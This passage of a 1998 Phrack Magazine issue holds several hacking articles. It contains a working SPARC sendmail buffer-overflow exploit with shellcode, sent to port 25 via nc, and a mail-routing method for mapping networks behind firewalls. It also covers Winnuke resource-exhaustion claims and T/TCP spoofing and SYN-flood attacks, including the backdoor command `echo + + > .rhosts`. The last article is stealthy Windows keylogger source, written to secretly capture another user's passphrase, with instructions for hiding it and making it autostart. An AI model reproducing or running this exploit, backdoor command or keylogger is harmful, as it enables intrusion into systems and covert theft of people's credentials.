        printf("Usage: %s bufsize <alignment offset> | nc target 25\n",
               argv[0]);
        exit(1);
    }
    prelude = atoi(argv[1]);

    for (i = 6; i < (6 + atoi(argv[2])); i++) {
        strcat(padding, "A");
    }
    for (i = 0; i < prelude; i++) {
        large_string[i] = 0xfffffff0;           /* Illegal instruction */
    }
    large_string[prelude] = 0xf7ffef50;         /* Arbitrary overwrite of %fp */
    large_string[prelude + 1] = 0xf7fff00c;     /* Works for me; address of code */

    for (i = (prelude + 2); i < (prelude + 64); i++) {
        large_string[i] = 0xa61cc013;           /* Lots of sparc NOP's */
    }

    /* Now the sparc execve /usr/etc/rpc.rexd code.. */
    large_string[prelude + 64] = 0x250bcbc8;
    large_string[prelude + 65] = 0xa414af75;
    large_string[prelude + 66] = 0x271cdc88;
    large_string[prelude + 67] = 0xa614ef65;
    large_string[prelude + 68] = 0x291d18c8;
    large_string[prelude + 69] = 0xa8152f72;
    large_string[prelude + 70] = 0x2b1c18c8;
    large_string[prelude + 71] = 0xaa156e72;
    large_string[prelude + 72] = 0x2d195e19;
    large_string[prelude + 73] = 0x900b800e;
    large_string[prelude + 74] = 0x9203a014;
    large_string[prelude + 75] = 0x941ac00b;
    large_string[prelude + 76] = 0x9c03a104;
    large_string[prelude + 77] = 0xe43bbefc;
    large_string[prelude + 78] = 0xe83bbf04;
    large_string[prelude + 79] = 0xec23bf0c;
    large_string[prelude + 80] = 0xdc23bf10;
    large_string[prelude + 81] = 0xc023bf14;
    large_string[prelude + 82] = 0x8210203b;
    large_string[prelude + 83] = 0xaa103fff;
    large_string[prelude + 84] = 0x91d56001;
    large_string[prelude + 85] = 0xa61cc013;
    large_string[prelude + 86] = 0xa61cc013;
    large_string[prelude + 87] = 0xa61cc013;
    large_string[prelude + 88] = 0;

    /* And finally, the overflow..simple, huh? :) */
    printf("helo\n");
    printf("mail from: %s%s\n", padding, (char *)large_string);
    return 0;
}
<-->

0x7>-------------------------------------------------------------------------

                        Practical Sendmail Routing

Intro:

This article will be short and sweet, as the concept and methodology are
quite simple. UUCP-style routing has been around longer than most newbie
hackers, yet it is a foreign concept to them. In past years, Phrack has seen
at least one article on using this method to route a piece of mail around
the world and back to the base host. That article in Phrack 41 (Network
Miscellany) by the Racketeer gave us a good outline as to how to implement
routed mail. I will recap that method and show a practical use for it. If
you have any questions on the method for building the mail headers, read a
book on UUCP or something.

How to:

In short, you want to create a custom route for a piece of email to follow.
This single piece of mail will follow your desired path and go through
machines of your choice. Even with mail relaying turned off, MTAs will still
pass this mail along, since each one looks at the mail and delivers it only
one hop at a time. The customized headers basically tell sendmail that it
should only be concerned about the next target in the path, and to deliver.
In our example below, we will have nine systems to be concerned about: your
base host, seven systems to bounce through, and the user on the final
destination machine.

    host1       = origin of mail. base host to send from.
    host2       = second...
    host3       = third... (etc)
    host4
    host5
    host6
    host7
    host8       = final hop in our chain (i.e.: second to last)
    user @ dest = final resting place for mail

Most people will wonder "why route mail, sendmail will deliver directly".
Consider the first step in doing a penetration of a foreign network: recon.
A would-be attacker needs as much information about a remote host as
possible. Have you ever sent mail to a remote system with the intention of
bouncing it? If not, try it. You will find it a quick and easy way of
finding out what version of what MTA the host is running. Knowing that the
message will bounce with that information, think larger. Send mail to
multiple hosts on a subnet and it will return the version information for
each machine it bounces through. Think larger. Firewalls are often set up to
allow mail to go in and out without a problem. So route your mail past the
firewall, bounce it among several internal systems, then route the mail
right back out the front door. You are left with a single piece of mail
containing information on each system it bounced through. Right off, you can
start to assess, among other things, whether the machines are running Unix.

So, with the example above, your mail 'to' will look like this:

    host3!host4!host5!host6!host7!host8!dest!user@host2

I know. Very weird as far as the order and placement of each. If you don't
think it looks right, go reference it.
Goal:

The desired outcome of this mail is to return with as much information about
the remote network as possible. There are a few things to be wary of,
however. If the mail hits a system that doesn't know how to handle it, you
may never see it again. Routing the mail through a hundred hosts behind a
firewall is risky in that it may take a while to go through, and if it
encounters problems you may not get word back to know where it messed up.
What I recommend is sending one piece of mail per host on the subnet. This
can be scripted out fairly easily, so let this be a lesson in scripting as
well.

Theoretical Route 1:

    you --.
          firewall --.
                     internal host1 --.
                                      |
                     internal host2 --'
          firewall --'
    you --'

Theoretical Route 2:

If the internal network is on a different IP scheme than the external
machines (i.e., address translation), then your mail will fail at the first
hop by the above means. So we can try an alternative of passing mail to both
sides of the firewall in order. Of course, this would rely on knowledge of
internal network numbering. If you are wondering how to get this, two ways
come to mind. If you are one of those wacky 'white hat' ethical hackers,
this information is often given during a controlled penetration. If you are
a malicious 'black hat' evil hacker, then trashing or Social Engineering
might be an option.

    you --.
          firewall (external interface) --.
          firewall (internal interface) --.
                                          |
                     .-- internal host1 --'
                     |
                     `-- internal host2 --.
                                          |
          firewall (internal interface) --'
          firewall (external interface) --'
    you --'

Taking it to the next level:

So if you find this works, what else can you do? Have a remote sendmail
attack lying around? Can you run a command on a remote machine? Know what an
xterm is? Firewalls often allow a wide variety of traffic to go outbound. So
route a remote sendmail-based attack to the internal host of your choice,
spawn an xterm to your terminal and voila. You just bypassed a firewall!

Conclusion:

Yup. That is it. Short and sweet.
No need to put excess words in this article, as you are probably late on
your hourly check of rootshell.com looking for the latest scripts. Expand
your minds.

Hi: mea_culpa  mea_culpa@sekurity.org

* "taking it to the next level" is a bastardized trademark of MC.
* 'wacky white hat ethical hacker' is probably a trademark of IBM.
* 'malicious black hat evil hacker' is a trademark of the ICSA.

0x8>-------------------------------------------------------------------------

                   Resource Hacking and Windows NT/95

                            by Lord Byron

With the release of Windows NT Service Pack 3, the infamous Winnuke denial
of service attacks are rendered useless. At least, that is what they lead
you to believe. This is not the case. To understand why, we need to delve
into a little background on the internals of Windows; more specifically,
the way that Windows allocates memory. This is the undying problem.

To better understand the problems with Windows memory allocation you have
to go very deep within the operating system, to what is commonly called the
"thunking layer". This layer is what allows Windows to call both 16 and
32-bit functions on the same function stack. If you make a TCP/IP-type
function call or (if you are a database person) an ODBC function call, you
are calling a pseudo 32-bit function. Yes, both of these direct drivers are
32-bit drivers, but they rely upon 16-bit code to finish their process.
Once you enter one of these drivers all the data is passed into that
driver. Windows also requires all drivers to run at level 0 within the
Windows kernel. These drivers then pass off the data to different 16-bit
functions. The difficulty of passing off 32-bit data to a 16-bit function
is where the thunking layer comes into the picture. The thunking layer is a
wrapper around all 16-bit functions in Windows that can be called by a
32-bit function.
It thunks the data calls down to 16-bit by converting them into multiple
data elements (normally done with a structure) or by passing the actual
memory dump of the variable into the function. Then the function does its
processing on the data within the datagram and passes it back out of the
function. At this point it goes back through the thunking layer, which
reconverts the data back to a 32-bit variable, and the 32-bit driver
carries on with its processing. This thunking-layer scheme is not unheard
of, nor is this the first time it has been used, but given the way that we
all know Microsoft codes, it was done in a hurry, not properly implemented,
and never tested until production.

For the aforementioned reasons it should come as no surprise to anyone that
the code has severe memory leaks. This is why if you, for example, make
ODBC calls to an Oracle database for long enough, your Windows box
eventually becomes slower and slower until an eventual crash (the "Blue
Screen of Death") or the machine just becomes unbearable to work with. As
Microsoft tries to patch these bugs in the device drivers, it releases
service packs such as SP3. Microsoft has developed and implemented the
device driver process on a modular code basis, so when a patch is
implemented, the driver actually calls the modular patch code to handle the
exact situation for that exploit.

Now that you know some of the basic internals as to how Windows makes its
calls, it is time to understand resource hacking and the reason Win-nuke
still works. If you ping a Windows box, it allocates a certain amount of
RAM and runs code within the driver that returns the ICMP packet. Well, if
you ping a Windows box 20,000 or 30,000 times, it has to allocate 20 or 30
thousand chunks of memory to run the device driver that returns the ICMP
packet.
Once those 20 or 30 thousand little chunks of memory are out there, there
is not enough memory left to allow the TCP/IP driver to spawn the code that
handles normal functions within the Windows box. At this point, if you were
to run Win-nuke to send the OOB packet to port 139 on the Windows box, it
would crash the box. The OOB code that was used to patch Win-nuke in SP3
cannot be spawned due to the lack of available memory, so the packet gets
processed by the standard TCP/IP driver (the TCP/IP.sys originally shipped
with Windows), without the fix. The only way for Microsoft to actually fix
this problem would be to rewrite the TCP/IP driver with the correct code
within it as the core driver (instead of writing patches to be spawned when
the exception occurs). Doing this, though, would require of Microsoft a
significant amount of coding skill and talent, which we know no
self-respecting coder would ever supply by working for the big evil.

0x9>-------------------------------------------------------------------------

----[ PDM

Phrack Doughnut Movie (PDM) last issue was `Grosse Point Blank`.

PDM52 recipients:

    Jim Broome
    Jonathan Ham
    Jon "Boyracer" George
    James Hanson
    Jesse Paulsen
    jcoest

All the recipients have J* first names. Eerie. And what is actually
involved in `boyracing`? Do they put little saddles on them?

PDM53 Challenge:

"...Remember, ya always gotta put one in the brain. The first one puts him
down, the second one finishes him off. Then he's dead. Then we go home."
----[ EOF

--------------------------------------------------------------------------------

---[ Phrack Magazine   Volume 8, Issue 53  July 8, 1998, article 06 of 15

-------------------------[ T/TCP vulnerabilities

--------[ route|daemon9 <route@infonexus.com>

----[ Introduction and Impetus

T/TCP is TCP for Transactions. It is a backward-compatible extension for
TCP to facilitate faster and more efficient client/server transactions.
T/TCP is not in wide deployment, but it is in use (see appendix A) and it
is supported by a handful of OS kernels including FreeBSD, BSDi, Linux, and
SunOS. This article will document the T/TCP protocol in light detail, and
then cover some weaknesses and vulnerabilities.

----[ Background and primer

TCP is a protocol designed for reliability at the expense of expediency
(readers unfamiliar with the TCP protocol are directed to the
ancient-but-still-relevant:). Whenever an application is deemed to require
reliability, it is usually built on top of TCP. This lack of speed is
considered a necessary evil. Short-lived client/server interactions
desiring more speed (short in terms of time vs. amount of data flow) are
typically built on top of UDP to preserve quick response times. One
exception to this rule, of course, is http. The architects of http decided
to use the reliable TCP transport for ephemeral connections (indeed a
poorly designed protocol).

T/TCP is a small set of extensions to make a faster, more efficient TCP. It
is designed to be a completely backward-compatible set of extensions to
speed up TCP connections. T/TCP achieves its speed increase from two major
enhancements over TCP: TAO and TIME_WAIT state truncation. TAO is TCP
Accelerated Open, which introduces new extended options to bypass the 3-way
handshake entirely.
Using TAO, a given T/TCP connection can approximate a UDP connection in
terms of speed, while still maintaining the reliability of a TCP
connection. In most single data packet exchanges (as is the case with
transaction-oriented connections like http) the packet count is reduced by
a third. The second speed-up is TIME_WAIT state truncation, which allows a
T/TCP client to shorten the TIME_WAIT state by up to a factor of 20. This
can allow a client to make more efficient use of network socket primitives
and system memory.

----[ T/TCP TAO

TCP Accelerated Open is how T/TCP bypasses the 3-way handshake. Before we
discuss TAO, we need to understand why TCP employs a 3-way handshake.
According to RFC 793, the principal reason for the exchange is the
prevention of old duplicate connection initiations wandering into current
connections and causing confusion. With this in mind, in order to obviate
the need for the 3-way handshake, there needs to be a mechanism for the
receiver of a SYN to guarantee that that SYN is in fact new. This is
accomplished with a new extended TCP header option, the connection count
(CC). The CC (referred to as tcp_ccgen on a host) is a simple monotonic
variable that a T/TCP host keeps and increments for every TCP connection
created on that host.

Any time a client host supporting T/TCP wishes to make a T/TCP connection
to a server, it includes (in its TAO packet) a CC (or CCnew) header option.
If the server supports T/TCP, it will cache that client's included CC value
and respond with a CCecho option (CC values are cached by T/TCP hosts on a
per-host basis). If the TAO test succeeds, the 3-way handshake is bypassed;
otherwise the hosts fall back to the older process. The first time a client
host supporting T/TCP and a server host supporting T/TCP make a connection,
no CC state exists for that client on that server. Because of this fact,
the 3-way handshake must be done.
However, also at that time, the per-host CC cache for that client host is
initialized, and all subsequent connections can use TAO. The TAO test on
the server simply checks to make sure the client's CC is greater than the
last received CC from that client. Consider figure 1 below:

        Client                              Server
   -----------------------------------------------------------------------
T  0  --TAO+data--(CC = 2)-->               ClientCC = 1
i  1                                        2 > 1; TAO test succeeds
m  2                                        accept data ---> (to application)
e
                                [ fig 1 ]

Initially (0) the client sends a TAO-encapsulated SYN to the server, with a
CC of 2. Since the CC value on the server for this client is 1 (indicating
they have had previous T/TCP-based communication), the TAO test succeeds
(1). Since the TAO test was successful, the server can pass the data to the
application layer immediately (2). If the client's CC had not been greater
than the server's cached value, the TAO test would have failed and forced
the 3-way handshake.

----[ T/TCP TIME_WAIT truncation

Before we can see why it is OK to shorten the TIME_WAIT state, we need to
cover exactly what it is and why it exists. Normally, when a client
performs an active close on a TCP connection, it must hold onto state
information for twice the maximum segment lifetime (2MSL), which is usually
between 60 - 240 seconds (during this time, the socket pair that describes
the connection cannot be reused). It is thought that any packet from this
connection would by then be expired (due to IP TTL constraints) from the
network. TCP must be consistent with its behavior across all contingencies,
and the TIME_WAIT state guarantees this consistency during the last phase
of connection closedown. It keeps old network segments from wandering into
a connection and causing problems, and it helps implement the 4-way
closedown procedure.
For example, if a wandering packet happens to be a retransmission of the
server's FIN (presumably due to the client's ACK being lost), the client
must be sure to retransmit the final ACK, rather than an RST (which it
would do if it had torn down all the state).

T/TCP allows for the truncation of the TIME_WAIT state. If a T/TCP
connection only lasts for MSL seconds or less (which is usually the case
with transaction-oriented connections), the TIME_WAIT state is truncated to
as little as 12 seconds (8 times the retransmission timeout, RTO). This is
allowable from a protocol standpoint because of two things: CC number
protection against old duplicates, and the fact that the 4-way closedown
packet-loss scenario (see above) can be handled by waiting for the RTO
(multiplied by a constant) as opposed to waiting for a whole 2MSL. As long
as the connection didn't last any longer than MSL, the CC number in the
next connection will prevent old packets with an older CC number from being
accepted. This protects connections from old wandering packets (if the
connection did last longer, it is possible for the CC values to wrap and
potentially be erroneously delivered to a new incarnation of a connection).

----[ Dominance of TAO

It is easy for an attacker to ensure the success or failure of the TAO
test. There are two methods. The first relies on the second oldest hacking
tool in the book. The second is more of a brutish technique, but is just as
effective.

--[ Packet sniffing

If we are on the local network with one of the hosts, we can snoop the
current CC value in use for a particular connection. Since the tcp_ccgen is
incremented monotonically, we can precisely spoof the next expected value
by incrementing the snooped number. Not only will this ensure the success
of our TAO test, but it will ensure the failure of the next TAO test for
the client we are spoofing.

--[ The numbers game

The other method of TAO dominance is a bit rougher, but works almost as
well.
The CC is an unsigned 32-bit number (ranging in value from 0 -
4,294,967,295). Under all observed implementations, the tcp_ccgen is
initialized to 1. If an attacker needs to ensure the success of a TAO
connection, but is not in a position where s/he can sniff on a local
network, they should simply choose a large value for the spoofed CC. It is
highly unlikely that one given T/TCP host will burn through even half the
tcp_ccgen space with another given host. Simple statistics tell us that the
larger the chosen CC, the greater the odds that the TAO test will succeed.
When in doubt, aim high.

----[ T/TCP and SYN flooding

TCP SYN flooding hasn't changed much under TCP for Transactions. The actual
attack is the same: a series of TCP SYNs spoofed from unreachable IP
addresses. However, there are 2 major considerations to keep in mind when
the target host supports T/TCP:

1) SYN cookie invalidation: A host supporting T/TCP cannot, at the same
time, implement SYN cookies. TCP SYN cookies are a SYN flood defense
technique that works by sending a secure cookie as the sequence number in
the second packet of the 3-way handshake, then discarding all state for
that connection. Any TCP options sent would be lost. Only if the final ACK
comes in will the host create the kernel socket data structures. TAO
obviously cannot be used with SYN cookies.

2) Failed TAO processing results in queued data: If the TAO test fails, any
data included with that packet will be queued pending the completion of the
connection processing (the 3-way handshake). During a SYN flood, this can
make the attack more severe as memory buffers fill up holding this data. In
this case, the attacker would want to ensure the failure of the TAO test
for each spoofed packet.

In a previous Phrack Magazine article, the author erroneously reported that
T/TCP would help to alleviate SYN flood vulnerability.
This obviously incorrect statement was made before copious T/TCP research was done and is hereby rescinded. My bad.

----[ T/TCP and trust relationships

An old attack with a new twist. The attack paradigm is still the same (readers unfamiliar with trust relationship exploitation are directed to P48-14); this time, however, it is easier to wage. Under T/TCP, there is no need to attempt to predict TCP sequence numbers. Previously, this attack required the attacker to predict the return sequence number in order to complete the connection establishment processing and move the connection into the established state. With T/TCP, a packet's data will be accepted by the application as soon as the TAO test succeeds. All the attacker needs to do is ensure that the TAO test will succeed. Consider the figure below.

        Attacker                Server                  Trusted
-----------------------------------------------------------------------
    0   -spoofed-TAO->
    1                   TAO test succeeds
T   2                   data to application
i   3                   ---TAO-response->
m   4                                           no open socket
e   5                   <------RST-------
    6                   tears down connection

                                [ fig 2 ]

The attacker first sends a spoofed connection request TAO packet to the server. The data portion of this packet presumably contains the tried and true non-interactive backdooring command `echo + + > .rhosts`. At (1) the TAO test succeeds and the data is accepted (2) and passed to the application (where it is processed). The server then sends its T/TCP response to the trusted host (3). The trusted host, of course, has no open socket (4) for this connection, and responds with the expected RST segment (5). This RST will tear down the attacker's spoofed connection (6) on the server. If everything went according to plan, and the process executing the command in question didn't take too long to run, the attacker may now log directly into the server. To deal with (5) the attacker can, of course, wage some sort of denial of service attack on the trusted host to keep it from responding to the unwarranted connection.
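The TAO acceptance rule that all of these attacks hinge on can be sketched in a few lines of C. This is purely illustrative — the structure and function names below are mine, not taken from any real stack — but it captures the decision described above: a SYN carrying a CC option bypasses the 3-way handshake only if its CC is strictly greater than the value cached for that host.

```c
#include <stdint.h>

/* Illustrative sketch of the TAO test -- not code from any real stack.
 * A per-host cache remembers the last CC value received from that peer. */
struct tao_cache {
    uint32_t cc_recv;   /* last CC seen from this host; 0 == undefined */
};

/* Returns 1 if the TAO test passes (segment data may go straight to the
 * application), 0 if the host must fall back to the 3-way handshake. */
int tao_test(struct tao_cache *cache, uint32_t cc_new)
{
    if (cache->cc_recv != 0 && cc_new > cache->cc_recv) {
        cache->cc_recv = cc_new;    /* update the per-host cache */
        return 1;
    }
    return 0;                       /* undefined cache or stale CC */
}
```

Both dominance methods are just ways of forcing a particular branch: a sniffed-and-incremented CC clears the cached value by exactly one, while a huge spoofed CC (say 4,000,000,000) almost certainly exceeds whatever the cache holds.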
----[ T/TCP and duplicate message delivery

Ignoring all the other weaknesses of the protocol, there is one major flaw that causes T/TCP to degrade and behave decidedly non-TCP-like, thereby breaking the protocol entirely. The problem is within the TAO mechanism. Certain conditions can cause T/TCP to deliver duplicate data to the application layer. Consider the timeline in figure 3 below:

        Client                          Server
-----------------------------------------------------------------------
    0   --TAO-(data)--->
    1                                   TAO test succeeds
T   2                                   accept data ---> (to application)
i   3                                   *crash* (reboot)
m   4   timeout (resends)
        --TAO-(data)--->
e   5                                   TAO test fails (data is queued)
    6   established  <-SYN-ACK(SYN)--   fallback to 3WHS
    7   --ACK(SYN)----->                established (data --> application)

                                [ fig 3 ]

At time 0 the client sends its TAO encapsulated data to the server (for this example, consider that both hosts have had recent communication, and the server has defined CC values for the client). The TAO test succeeds (1) and the server passes the data to the application layer for processing (2). Before the server can send its response, however (presumably an ACK), it crashes (3). The client receives no acknowledgement from the server, so it times out and resends its packet (4). After the server reboots it receives this retransmission; this time, however, the TAO test fails and the server queues the data (5). The TAO test failed and forced a 3-way handshake (6) because the server's CC cache was invalidated when it rebooted. After completing the 3-way handshake and establishing a connection, the server then passes the queued data to the application layer, for a second time. The server cannot tell that it has already accepted this data because it maintains no state after a reboot. This violates the basic premise of T/TCP: that it must remain completely backward compatible with TCP.

----[ In closing

T/TCP is a good idea that just wasn't implemented properly.
TCP was not designed to support a connectionless-like paradigm while still maintaining reliability and security (TCP wasn't even designed with security in mind at all). T/TCP brings out too many problems and discrete bugs in TCP to be anything more than a novelty.

----[ Appendix A: Internet hosts supporting RFC 1644

This information is ganked from Richard Stevens' T/TCP homepage (). It is not verified to be correct.

- - - - - - -

----[ Appendix B: Bibliography

1) Braden, R. T. 1994 "T/TCP - TCP Extensions for Transactions...", 38 p
2) Braden, R. T. 1992 "Extending TCP for Transactions - Concepts...", 38 p
3) Stevens, W. Richard. 1996 "TCP/IP Illustrated, Volume 3", 328 p
4) Smith, Mark. 1996, "Formal verification of Communication...", 15 p

----[ EOF

--------------------------------------------------------------------------------

---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 07 of 15

-------------------------[ A Stealthy Windows Keylogger

--------[ markj8@usa.net

I recently felt the need to acquire some data being typed into Windows95 machines on a small TCP-IP network. I had occasional physical access to the machines and I knew the remote administration password, but the files were being saved in BestCryptNP volumes, the passphrase for which I didn't know... I searched the Net as best I could for a suitable keylogging program that would allow me to capture the passphrase without being noticed, but all I could find was a big boggy thing written in visual basic that insisted on opening a window. I decided to write my own. I wanted to write it as a VXD because they run at Privilege Level 0 and can do just about ANYTHING. I soon gave up on this idea because I couldn't acquire the correct tools and certainly couldn't afford to buy them. While browsing through the computer section of my local public library one day I noticed a rather thin book called "WINDOWS ASSEMBLY LANGUAGE and SYSTEMS PROGRAMMING" by Barry Kauler, (ISBN 0 13 020207 X) c 1993.
A quick flick through the Table of Contents revealed "Chapter 10: Real-Time Events, Enhanced Mode Hardware Interrupts". I immediately borrowed the book and photocopied it (Sorry about the royalties Barry). As I read chapter 10 I realized that all I needed was a small 16-bit Windows program running as a normal user process to capture every keystroke typed into Windows. The only caveat was that keystrokes typed into DOS boxes wouldn't be captured. Big deal. I could live without that. I was stunned to discover that all user programs in Windows share a single Interrupt Descriptor Table (IDT). This implies that if one user program patches a vector in the IDT, then all other programs are immediately affected. The only tool I had for generating Windows executables was Borland C Ver 2.0, which makes small and cute Windows 3.0 EXE's, so that's what I used. I have tested it on Windows for Workgroups 3.11, Windows 95 OSR2, and Windows 98 beta 3. It will probably work on Windows 3.x as well. As supplied, it will create a hidden file in the \WINDOWS\SYSTEM directory called POWERX.DLL and record all keystrokes into it using the same encoding scheme as Doc Cypher's KEYTRAP3.COM program for DOS. This means that you can use the same conversion program, CONVERT3.C, to convert the raw scancodes in the log file to readable ASCII. I have included a slightly "improved" version of CONVERT3.C with a couple of bugs fixed. I contemplated incorporating the functionality of CONVERT3 into W95Klog, but decided that logging scancodes was "safer" than logging plain ASCII. If the log file is larger than 2 megabytes when the program starts, it will be deleted and re-created with length zero. When you press CTRL-ALT-DEL (in Windows 95/98) to look at the Task List, W95Klog will show up as "Explorer". You can change this by editing the .DEF file and recompiling, or by HEX Editing the .EXE file. If anyone knows how to stop a user program from showing on this list please tell me.
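The encoding scheme shared by the logger and CONVERT3 is simple enough to sketch before diving into the source. The helper below is illustrative (it is not part of either program): the raw keyboard scancode is logged as-is, except that bit 7 (i.e. +128) is flipped in when shift or an effective caps-lock applies, so a single logged byte carries both the key and its shift state.

```c
/* Illustrative helper, not part of W95Klog or CONVERT3: bit 7 of the
 * logged scancode encodes the shift/caps state of the keystroke. */
#define WS 128  /* "with shift" offset, same convention as CONVERT3 */

unsigned char log_scancode(unsigned char scancode, int shifted)
{
    return shifted ? (unsigned char)(scancode ^ WS) : scancode;
}
```

Scancode 16 ('q') is thus logged as 16 unshifted and 144 shifted, which the converter maps back to "q" and "Q" respectively via its two halves of the keys[] table.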
To cause the target machine to run W95Klog every time it starts Windows you can:

1) Edit win.ini, [windows] section to say run=WHLPFFS.EXE or some such confusing name :) Warning! This will cause a nasty error message if WHLPFFS.EXE can't be found. This method has the advantage of being able to be performed over the network via "remote administration" without the need for both computers to be running "remote registry service".

2) Edit the registry key: (Win95/98) `HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run` and create a new key called whatever you like with a string value of "WHLPFFS.EXE" or whatever. This is my preferred method because it is less likely to be stumbled upon by the average user and windows continues without complaint if the executable can't be found.

The log file can be retrieved via the network even when it is still open for writing by the logging program. This is very convenient ;).

<++> EX/win95log/convert.c
//
// Convert v3.0
// Keytrap logfile converter.
// By dcypher <dcypher@mhv.net>
// MSVC++1.52 (Or Borland C 1.01, 2.0 ...)
// Released: 8/8/95
//
// Scancodes above 185(0xB9) are converted to "<UK>", UnKnown.
//

#include <stdio.h>
#include <string.h>     // for strcpy() - was missing in the original

#define MAXKEYS 256
#define WS 128

const char *keys[MAXKEYS];

void main(int argc,char *argv[])
{
 FILE *stream1;
 FILE *stream2;
 unsigned int Ldata,Nconvert=0,Yconvert=0;
 char logf_name[100],outf_name[100];

 //
 // HERE ARE THE KEY ASSIGNMENTS !!
 //
 // You can change them to anything you want.
 // If any of the key assignments are wrong, please let
 // me know. I haven't checked all of them, but it looks ok.
 //
 //           v--- Scancodes logged by the keytrap TSR
 //                      v--- Converted to the string here
 keys[1] = "<uk>";
 keys[2] = "1";
 keys[3] = "2";
 keys[4] = "3";
 keys[5] = "4";
 keys[6] = "5";
 keys[7] = "6";
 keys[8] = "7";
 keys[9] = "8";
 keys[10] = "9";
 keys[11] = "0";
 keys[12] = "-";
 keys[13] = "=";
 keys[14] = "<bsp>";
 keys[15] = "<tab>";
 keys[16] = "q";
 keys[17] = "w";
 keys[18] = "e";
 keys[19] = "r";
 keys[20] = "t";
 keys[21] = "y";
 keys[22] = "u";
 keys[23] = "i";
 keys[24] = "o";
 keys[25] = "p";
 keys[26] = "[";              /* = ^Z Choke! */
 keys[27] = "]";
 keys[28] = "<ret>";
 keys[29] = "<ctrl>";
 keys[30] = "a";
 keys[31] = "s";
 keys[32] = "d";
 keys[33] = "f";
 keys[34] = "g";
 keys[35] = "h";
 keys[36] = "j";
 keys[37] = "k";
 keys[38] = "l";
 keys[39] = ";";
 keys[40] = "'";
 keys[41] = "`";
 keys[42] = "<LEFT SHIFT>";   // left shift - not logged by the tsr
 keys[43] = "\\";             // and not converted
 keys[44] = "z";
 keys[45] = "x";
 keys[46] = "c";
 keys[47] = "v";
 keys[48] = "b";
 keys[49] = "n";
 keys[50] = "m";
 keys[51] = ",";
 keys[52] = ".";
 keys[53] = "/";
 keys[54] = "<RIGHT SHIFT>";  // right shift - not logged by the tsr
 keys[55] = "*";              // and not converted
 keys[56] = "<alt>";
 keys[57] = " ";

 // now show with shift key
 // the TSR adds 128 to the scancode to show shift/caps
 keys[1+WS] = "[";            /* was "<unknown>" but now fixes ^Z problem */
 keys[2+WS] = "!";
 keys[3+WS] = "@";
 keys[4+WS] = "#";
 keys[5+WS] = "$";
 keys[6+WS] = "%";
 keys[7+WS] = "^";
 keys[8+WS] = "&";
 keys[9+WS] = "*";
 keys[10+WS] = "(";
 keys[11+WS] = ")";
 keys[12+WS] = "_";
 keys[13+WS] = "+";
 keys[14+WS] = "<shift+bsp>";
 keys[15+WS] = "<shift+tab>";
 keys[16+WS] = "Q";
 keys[17+WS] = "W";
 keys[18+WS] = "E";
 keys[19+WS] = "R";
 keys[20+WS] = "T";
 keys[21+WS] = "Y";
 keys[22+WS] = "U";
 keys[23+WS] = "I";
 keys[24+WS] = "O";
 keys[25+WS] = "P";
 keys[26+WS] = "{";
 keys[27+WS] = "}";
 keys[28+WS] = "<shift+ret>";
 keys[29+WS] = "<shift+ctrl>";
 keys[30+WS] = "A";
 keys[31+WS] = "S";
 keys[32+WS] = "D";
 keys[33+WS] = "F";
 keys[34+WS] = "G";
 keys[35+WS] = "H";
 keys[36+WS] = "J";
 keys[37+WS] = "K";
 keys[38+WS] = "L";
 keys[39+WS] = ":";
 keys[40+WS] = "\"";
 keys[41+WS] = "~";
 keys[42+WS] = "<LEFT SHIFT>";  // left shift - not logged by the tsr
 keys[43+WS] = "|";             // and not converted
 keys[44+WS] = "Z";
 keys[45+WS] = "X";
 keys[46+WS] = "C";
 keys[47+WS] = "V";
 keys[48+WS] = "B";
 keys[49+WS] = "N";
 keys[50+WS] = "M";
 keys[51+WS] = "<";
 keys[52+WS] = ">";
 keys[53+WS] = "?";
 keys[54+WS] = "<RIGHT SHIFT>"; // right shift - not logged by the tsr
 keys[55+WS] = "<shift+*>";     // and not converted
 keys[56+WS] = "<shift+alt>";
 keys[57+WS] = " ";

 printf("\n");
 printf("Convert v3.0\n");
 // printf("Keytrap logfile converter.\n");
 // printf("By dcypher <dcypher@mhv.net>\n\n");
 printf("Usage: CONVERT infile outfile\n");
 printf("\n");

 if (argc==3)
    {
     strcpy(logf_name,argv[1]);
     strcpy(outf_name,argv[2]);
    }
 else
    {
     printf("Enter infile name: ");
     scanf("%99s",logf_name);        // was &logf_name - the array itself
     printf("Enter outfile name: "); // decays to the pointer scanf expects
     scanf("%99s",outf_name);
     printf("\n");
    }

 stream1=fopen(logf_name,"rb");
 stream2=fopen(outf_name,"a+b");

 if (stream1==NULL || stream2==NULL)
    {
     if (stream1==NULL)
        printf("Error opening: %s\n\a",logf_name);
     else
        printf("Error opening: %s\n\a",outf_name);
    }
 else
    {
     fseek(stream1,0L,SEEK_SET);
     printf("Reading data from: %s\n",logf_name);
     printf("Appending information to..: %s\n",outf_name);

     // test fgetc()'s return value directly, so the trailing EOF is not
     // written to the outfile as a bogus "<UK>"
     while ((Ldata=fgetc(stream1)) != (unsigned int)EOF)
        {
         if (Ldata>0 && Ldata<186)
            {
             if (Ldata==28 || Ldata==28+WS)
                {
                 fputs(keys[Ldata],stream2);
                 fputc(0x0A,stream2);
                 fputc(0x0D,stream2);
                }
             else
                 fputs(keys[Ldata],stream2);
             Yconvert++;    // count each converted scancode exactly once
            }
         else
            {
             fputs("<UK>",stream2);
             Nconvert++;
            }
        }
    }

 if (stream2) fflush(stream2);
 printf("\n\n");
 printf("Data converted....: %i\n",Yconvert);
 printf("Data not converted: %i\n",Nconvert);
 printf("\n");
 printf("Closing infile: %s\n",logf_name);
 printf("Closing outfile: %s\n",outf_name);
 if (stream1) fclose(stream1);   // don't fclose(NULL) on the error path
 if (stream2) fclose(stream2);
}
<-->
<++> EX/win95log/W95Klog.c
/*
 * W95Klog.C Windows stealthy keylogging program
 */

/*
 * This will ONLY compile with BORLANDC
 * V2.0 small model.
 * For other compilers you will have to change newint9()
 * and who knows what else :)
 *
 * Captures ALL interesting keystrokes from WINDOWS applications
 * but NOT from DOS boxes.
 * Tested OK on WFW 3.11, Win95 OSR2 and Win98 Beta 3.
 */

#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <dos.h>

//#define LOGFILE "~473C96.TMP" //Name of log file in WINDOWS\TEMP
#define LOGFILE "POWERX.DLL"    //Name of log file in WINDOWS\SYSTEM
#define LOGMAXSIZE 2097152      //Max size of log file (2Megs)
#define HIDDEN 2
#define SEEK_END 2
#define NEWVECT 018h            // "Unused" int that is used to call old
                                // int 9 keyboard routine.
                                // Was used for ROMBASIC on XT's
                                // Change it if you get a conflict with some
